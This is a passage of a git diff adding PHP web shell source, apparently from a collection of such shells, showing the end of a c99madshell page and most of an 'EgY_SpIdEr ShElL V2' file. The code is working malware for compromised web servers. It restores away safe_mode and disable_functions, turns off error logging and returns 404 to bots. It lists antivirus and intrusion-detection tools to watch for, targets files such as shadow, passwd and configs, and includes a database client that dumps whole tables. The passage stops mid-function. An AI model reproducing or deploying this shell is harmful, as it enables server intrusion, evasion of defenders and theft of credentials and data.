ok ]</font></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form method="POST"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="/var/www/html/wordpress/">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form method="POST""><input type=hidden name=act value="gofile"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="f" size="50" value="/var/www/html/wordpress/">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99madshell v. 3.0 BLOG edition<a href="#" OnClick="document.todo.act.value='about';document.todo.submit();"><u> EDITED BY </b><b>MADNET</u></b> </a> ]--</b></p></td></tr></table> +</body></html> \ No newline at end of file diff --git a/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php b/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php new file mode 100644 index 0000000..39bd725 --- /dev/null +++ b/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php @@ -0,0 +1,6146 @@ +<? +########################################### +# EgY_SpIdEr ShElL V2 # +# EgY_SpIdEr # +# www.egyspider.eu # +########################################### + +//Change User & Password + +$tacfgd['uname'] = 'smowu'; +$tacfgd['pword'] = 'smowu'; + + +// Title of page. +$tacfgd['title'] = 'EgY_SpIdEr ShElL'; + +// Text to appear just above login form. +$tacfgd['helptext'] = 'EgY SpIdEr ShElL'; + + +// Set to true to enable the optional remember-me feature, which stores encrypted login details to +// allow users to be logged-in automatically on their return. Turn off for a little extra security. +$tacfgd['allowrm'] = true; + +// If you have multiple protected pages, and there's more than one username / password combination, +// you need to group each combination under a distinct rmgroup so that the remember-me feature +// knows which login details to use. +$tacfgd['rmgroup'] = 'default'; + +// Set to true if you use your own sessions within your protected page, to stop txtAuth interfering. +// In this case, you _must_ call session_start() before you require() txtAuth. Logging out will not +// destroy the session, so that is left up to you. +$tacfgd['ownsessions'] = false; + + + + +foreach ($tacfgd as $key => $val) { + if (!isset($tacfg[$key])) $tacfg[$key] = $val; +} + +if (!$tacfg['ownsessions']) { + session_name('txtauth'); + session_start(); +} + +// Logout attempt made. Deletes any remember-me cookie as well +if (isset($_GET['logout']) || isset($_POST['logout'])) { + setcookie('txtauth_'.$rmgroup, '', time()-86400*14); + if (!$tacfg['ownsessions']) { + $_SESSION = array(); + session_destroy(); + } + else $_SESSION['txtauthin'] = false; +} +// Login attempt made +elseif (isset($_POST['login'])) { + if ($_POST['uname'] == $tacfg['uname'] && $_POST['pword'] == $tacfg['pword']) { + $_SESSION['txtauthin'] = true; + if ($_POST['rm']) { + // Set remember-me cookie for 2 weeks + setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14); + } + } + else $err = 'Login Faild !'; +} +// Remember-me cookie exists +elseif (isset($_COOKIE['txtauth_'.$rmgroup])) { + if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) { + $_SESSION['txtauthin'] = true; + } + else $err = 'Login Faild !'; +} +if (!$_SESSION['txtauthin']) { +@ini_restore("safe_mode"); +@ini_restore("open_basedir"); +@ini_restore("safe_mode_include_dir"); +@ini_restore("safe_mode_exec_dir"); +@ini_restore("disable_functions"); +@ini_restore("allow_url_fopen"); + +@ini_set('error_log',NULL); +@ini_set('log_errors',0); +?> +<html dir=rtl> +<head> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1256"> +<title><?=$tacfg['title']?></title> + +<STYLE> + +BODY + { + SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456 +} + +tr { +BORDER-RIGHT: #dadada ; +BORDER-TOP: #dadada ; +BORDER-LEFT: #dadada ; +BORDER-BOTTOM: #dadada ; +color: #ffffff; +} +td { +BORDER-RIGHT: #dadada ; +BORDER-TOP: #dadada ; +BORDER-LEFT: #dadada ; +BORDER-BOTTOM: #dadada ; +color: #dadada; +} +.table1 { +BORDER: 1; +BACKGROUND-COLOR: #000000; +color: #333333; +} +.td1 { +BORDER: 1; +font: 7pt tahoma; +color: #ffffff; +} +.tr1 { +BORDER: 1; +color: #dadada; +} +table { +BORDER: #eeeeee outset; +BACKGROUND-COLOR: #000000; +color: #dadada; +} +input { +BORDER-RIGHT: #00FF00 1 solid; +BORDER-TOP: #00FF00 1 solid; +BORDER-LEFT: #00FF00 1 solid; +BORDER-BOTTOM: #00FF00 1 solid; +BACKGROUND-COLOR: #333333; +font: 9pt tahoma; +color: #ffffff; +} +select { +BORDER-RIGHT: #ffffff 1 solid; +BORDER-TOP: #999999 1 solid; +BORDER-LEFT: #999999 1 solid; +BORDER-BOTTOM: #ffffff 1 solid; +BACKGROUND-COLOR: #000000; +font: 9pt tahoma; +color: #dadada;; +} +submit { +BORDER: buttonhighlight 1 outset; +BACKGROUND-COLOR: #272727; +width: 40%; +color: #dadada; +} +textarea { +BORDER-RIGHT: #ffffff 1 solid; +BORDER-TOP: #999999 1 solid; +BORDER-LEFT: #999999 1 solid; +BORDER-BOTTOM: #ffffff 1 solid; +BACKGROUND-COLOR: #333333; +font: Fixedsys bold; +color: #ffffff; +} +BODY { +margin: 1; +color: #dadada; +background-color: #000000; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} + +</STYLE> +<script language=\'javascript\'> +function hide_div(id) +{ + document.getElementById(id).style.display = \'none\'; + document.cookie=id+\'=0;\'; +} +function show_div(id) +{ + document.getElementById(id).style.display = \'block\'; + document.cookie=id+\'=1;\'; +} +function change_divst(id) +{ + if (document.getElementById(id).style.display == \'none\') + show_div(id); + else + hide_div(id); +} +</script>'; + +<body> +<br><br><div style="font-size: 14pt;" align="center"><?=$tacfg['title']?></div> +<hr width="300" size="1" noshade color="#cdcdcd"> +<p> +<div align="center" class="grey"> +<?=$tacfg['helptext']?> +</div> +<p> +<? +if (isset($_SERVER['REQUEST_URI'])) $action = $_SERVER['REQUEST_URI']; +else $action = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING']; +if (strpos($action, 'logout=1', strpos($action, '?')) !== false) $action = str_replace('logout=1', '', $action); +?> +<form name="txtauth" action="<?=$action?>" method="post"> +<div align="center"> +<table border="0" cellpadding="4" cellspacing="0" bgcolor="#666666" style="border: 1px double #dedede;" dir="ltr"> +<?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?> +<?if (isset($tacfg['uname'])) {?> +<tr><td>User:</td><td><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr> +<?}?> +<tr><td>Password:</td><td><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr> +<?if ($tacfg['allowrm']) {?> +<tr><td align="left"><input type="submit" name="login" value="Login"> +</td><td align="right"><input type="checkbox" name="rm" id="rm"><label for="rm"> + Remmeber Me?</label></td></tr> +<?} else {?> +<tr><td colspan="2" align="center"> + <input type="submit" name="login" value="Login"></td></tr> +<?}?> +</table> +</div> +</form> + +<br><br> +<hr width="300" size="1" noshade color="#cdcdcd"> +<div class="smalltxt" align="center">Developed by + <a href="mailto:egy_spider@hotmail.com">EgY SpIdEr </a>?copyright ? + & EgY SpIdEr</div> + +</body> +</html> +<? + // Don't delete this! + exit(); +} +?> +Login As (<font color="#FF0000"><? echo $tacfgd['uname']; ?></font>) <a href="?logout=1">Logout</a></p> +<div align="right"> +<?php + +if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");} + +$language='eng'; + +$auth = 0; + +$name='7d1f6442a9ed59e62f93dcbc2695baa6'; +$pass='7d1f6442a9ed59e62f93dcbc2695baa6'; + +//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8 +@setlocale(LC_ALL,'ru_RU.cp1251'); + +@ini_restore("safe_mode"); +@ini_restore("open_basedir"); +@ini_restore("safe_mode_include_dir"); +@ini_restore("safe_mode_exec_dir"); +@ini_restore("disable_functions"); +@ini_restore("allow_url_fopen"); + +if(@function_exists('ini_set')) + { + @ini_set('error_log',NULL); + @ini_set('log_errors',0); + @ini_set('file_uploads',1); + @ini_set('allow_url_fopen',1); + } +else + { + @ini_alter('error_log',NULL); + @ini_alter('log_errors',0); + @ini_alter('file_uploads',1); + @ini_alter('allow_url_fopen',1); + } + +error_reporting(E_ALL); + +/* ??? ????? */ +$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl'); +$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja'); +$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/'); +$downloaders = array('wget','fetch','lynx','links','curl','get'); + +/* ??? ?????? ???????? ???? ????? realpath() */ +//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; +//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz"; +//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ"; +//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz"; +//$chars_rlph = "_-.01234567890"; +$chars_rlph = "abcdefghijklnmopqrstuvwxyz"; + +$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php', +'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root', +'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs', +'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing'); + +/******************************************************************************************************/ + +define("starttime",@getmicrotime()); + +if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;}; + +set_magic_quotes_runtime(0); +@set_time_limit(0); +if(@function_exists('ini_set')) + { + @ini_set('max_execution_time',0); + @ini_set('output_buffering',0); + } +else + { + @ini_alter('max_execution_time',0); + @ini_alter('output_buffering',0); + } +$safe_mode = @ini_get('safe_mode'); +#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;}; +$version = '1.42'; +if(@version_compare(@phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + $_COOKIE = &$HTTP_COOKIE_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_COOKIE as $k=>$v) + { + $_COOKIE[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="HELLO!"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<h1>Access Denied</h1>"); + } +} + +if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) { + $tempdir='./'; + $select_tempdir = '<select name=tempdir><option value="./">./</option>'; + foreach( $tempdirs as $item) { + if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;} + } + $select_tempdir .= '</select>'; +}else{ + if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];} + $select_tempdir = $_COOKIE['select_tempdir']; +} + +$head = '<!-- EgY_SpIdEr --> +<html> +<head> +<meta http-equiv="Content-Language" content="ar-sa"> +<meta name="GENERATOR" content="Microsoft FrontPage 6.0"> +<meta name="ProgId" content="FrontPage.Editor.Document"> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1256"> +<title>EgY_SpIdEr ShElL</title> + + + +<STYLE> + +BODY + { + SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456 +} + +tr { +BORDER-RIGHT: #333333 ; +BORDER-TOP: #333333 ; +BORDER-LEFT: #333333 ; +BORDER-BOTTOM: #333333 ; +color: #FFFFFF; +} +td { +BORDER-RIGHT: #333333 ; +BORDER-TOP: #333333 ; +BORDER-LEFT: #333333 ; +BORDER-BOTTOM: #333333 ; +color: #FFFFFF; +} +.table1 { +BORDER: 1; +BACKGROUND-COLOR: #000000; +color: #333333; +} +.td1 { +BORDER: 1; +font: 7pt tahoma; +color: #ffffff; +} +.tr1 { +BORDER: 1; +color: #333333; +} +table { +BORDER: #eeeeee outset; +BACKGROUND-COLOR: #000000; +color: #333333; +} +input { +BORDER-RIGHT: #00FF00 1 solid; +BORDER-TOP: #00FF00 1 solid; +BORDER-LEFT: #00FF00 1 solid; +BORDER-BOTTOM: #00FF00 1 solid; +BACKGROUND-COLOR: #333333; +font: 9pt tahoma; +color: #ffffff; +} +select { +BORDER-RIGHT: #ffffff 1 solid; +BORDER-TOP: #999999 1 solid; +BORDER-LEFT: #999999 1 solid; +BORDER-BOTTOM: #ffffff 1 solid; +BACKGROUND-COLOR: #000000; +font: 9pt tahoma; +color: #333333;; +} +submit { +BORDER: buttonhighlight 1 outset; +BACKGROUND-COLOR: #272727; +width: 40%; +color: #333333; +} +textarea { +BORDER-RIGHT: #ffffff 1 solid; +BORDER-TOP: #999999 1 solid; +BORDER-LEFT: #999999 1 solid; +BORDER-BOTTOM: #ffffff 1 solid; +BACKGROUND-COLOR: #333333; +font: Fixedsys bold; +color: #ffffff; +} +BODY { +margin: 1; +color: #333333; +background-color: #000000; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} + +</STYLE> +<script language=\'javascript\'> +function hide_div(id) +{ + document.getElementById(id).style.display = \'none\'; + document.cookie=id+\'=0;\'; +} +function show_div(id) +{ + document.getElementById(id).style.display = \'block\'; + document.cookie=id+\'=1;\'; +} +function change_divst(id) +{ + if (document.getElementById(id).style.display == \'none\') + show_div(id); + else + hide_div(id); +} +</script>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} + +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } + +function moreread($temp){ +global $lang,$language; +$str=''; + if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){ + if($ffile){ + while(!@feof($ffile)){$str .= @fgets($ffile);}; + fclose($ffile); + } + }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){ + if($ffile){ + $str = @fread($ffile, @filesize($temp)); + @fclose($ffile); + } + }elseif(@function_exists('file')&&($ffiles = @file($temp))){ + foreach ($ffiles as $ffile) { $str .= $ffile; } + }elseif(@function_exists('file_get_contents')){ + $str = @file_get_contents($temp); + }elseif(@function_exists('readfile')){ + $str = @readfile($temp); + }elseif(@function_exists('highlight_file')){ + $str = @highlight_file($temp); + }elseif(@function_exists('show_source')){ + $str = @show_source($temp); + }else{echo $lang[$language.'_text56'];} +return $str; +} + +function readzlib($filename,$temp=''){ +global $lang,$language; +$str=''; + if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");}; + if(@copy("compress.zlib://".$filename, $temp)) { + $str = moreread($temp); + } else echo $lang[$language.'_text119']; + @unlink($temp); +return $str; +} + +function morewrite($temp,$str='') +{ +global $lang,$language; + if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ + if($ffile){ + @fwrite($ffile,$str); + @fclose($ffile); + } + }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ + if($ffile){ + @fputs($ffile,$str); + @fclose($ffile); + } + }elseif(@function_exists('file_put_contents')){ + @file_put_contents($temp,$str); + }else return 0; +return 1; +} + +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!@function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!@function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!@function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!@function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + case 'MySQLi': + if(empty($this->port)) { $this->port = '3306'; } + if(!@function_exists('mysqli_connect')) return 0; + $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port); + if(is_resource($this->connection)) return 1; + break; + case 'mSQL': + if(!@function_exists('msql_connect')) return 0; + $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'SQLite': + if(!@function_exists('sqlite_open')) return 0; + $this->connection = @sqlite_open($this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + case 'MySQLi': + return 1; + break; + case 'mSQL': + if(@msql_select_db($this->base,$this->connection)) return 1; + break; + case 'SQLite': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + case 'MySQLi': + if(false===($this->res=@mysqli_query($this->connection,$query))) + { + $this->error = @mysqli_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'mSQL': + if(false===($this->res=@msql_query($query,$this->connection))) + { + $this->error = @msql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'SQLite': + if(false===($this->res=@sqlite_query($this->connection,$query))) + { + $this->error = @sqlite_error_string($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MySQLi': + $this->num_rows=@mysqli_num_rows($this->res); + $this->num_fields=@mysqli_num_fields($this->res); + while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res))); + @mysqli_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'mSQL': + $this->num_rows=@msql_num_rows($this->res); + $this->num_fields=@msql_num_fields($this->res); + while(false !== ($this->rows[] = @msql_fetch_array($this->res))); + @msql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'SQLite': + $this->num_rows=@sqlite_num_rows($this->res); + $this->num_fields=@sqlite_num_fields($this->res); + while(false !== ($this->rows[] = @sqlite_fetch_array($this->res))); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MySQLi': + $this->dump[0] = '## MySQLi dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);} + $this->dump[] = 